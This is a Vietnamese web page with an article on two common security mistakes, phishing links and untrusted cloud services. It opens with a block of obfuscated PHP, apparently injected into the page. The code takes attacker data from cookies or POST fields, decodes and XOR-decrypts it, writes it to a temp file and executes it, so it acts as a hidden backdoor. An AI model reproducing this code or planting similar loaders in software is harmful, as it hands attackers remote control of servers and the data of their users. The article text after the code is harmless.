$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} 2 sai lầm về bảo mật mà nhiều người mắc phải, cách khắc phục - Tải Chùa

2 sai lầm về bảo mật mà nhiều người mắc phải, cách khắc phục

Rate this post

Rất nhiều người đồng ý rằng đa số người dùng không nhận thức được hết những mối đe dọa bảo mật ngày càng tinh vi  , thậm chí có một số người còn không hề quan tâm đến vấn đề bảo mật. Do đó thường mắc phải những sai làm đáng tiếc gây ra hậu quả vô cùng nghiêm trọng. Điểm danh 2 lỗi bảo mật mà người dùng hay mắc phải và hướng khắc phục qua bài viết dưới đây nhé. Ngoài ra còn các bài viết tương tựng như Sandboxie

sai lầm về bảo mật

Sai lầm về bảo mật

1. Bị lừa đảo

Đó là trường hợp khi bạn vô tính click vào một liên kết hay một tệp tin nào đó trong email hay trong các trang mạng xã hội,.. Những kẻ lừa đảo hết sức tinh vi khi chúng thiết kế đường link vô cùng độc đáo khiến bạn không hề có một chút nào gọi là nghi ngờ mà vô tư nghĩ rằng đó là bạn, các thành viên trong gia đình, công ty,…với những sản phẩm vô cùng hấp dẫn.

Hướng giải quyết: Tạo thói quen cho chính mình và cho những người thân cảnh giác và có thái độ hoài nghi về mọi thứ , chỉ nhấn vào đường link bất kỳ khi xác định rõ được nguồn gốc của chúng , đồng thời các doanh nghiệp cũng cần đưa ra những bài tập huấn đơn giản để nâng cao nhận thức cho nhân viên của mình.

2. Sử dụng dịch vụ đám mây hay ứng dụng chưa xác thực

Với sự tiện ích của các dịch vụ điện toán đám mây, nên hầu hết mọi người đều sử dụng chúng ngay cả những dịch vụ mà chưa có tên tuổi cũng như chưa xác định có an toàn hay không. Có rất nhiều người dùng còn chủ quan đến nỗi gửi cả những thông tin cá nhân lên đó , thậm chí có doanh nghiệp còn chọn những dịch vụ này là địa chỉ lưu trữ những tài liệu của cả công ty.

Những sai lầm về bảo mật

Những sai lầm về bảo mật

Giải pháp: Bạn nên tìm hiểu và sử dụng giải pháp lưu trữ đám mây đáng tin cậy, có tính năng và giải pháp xác thực cao.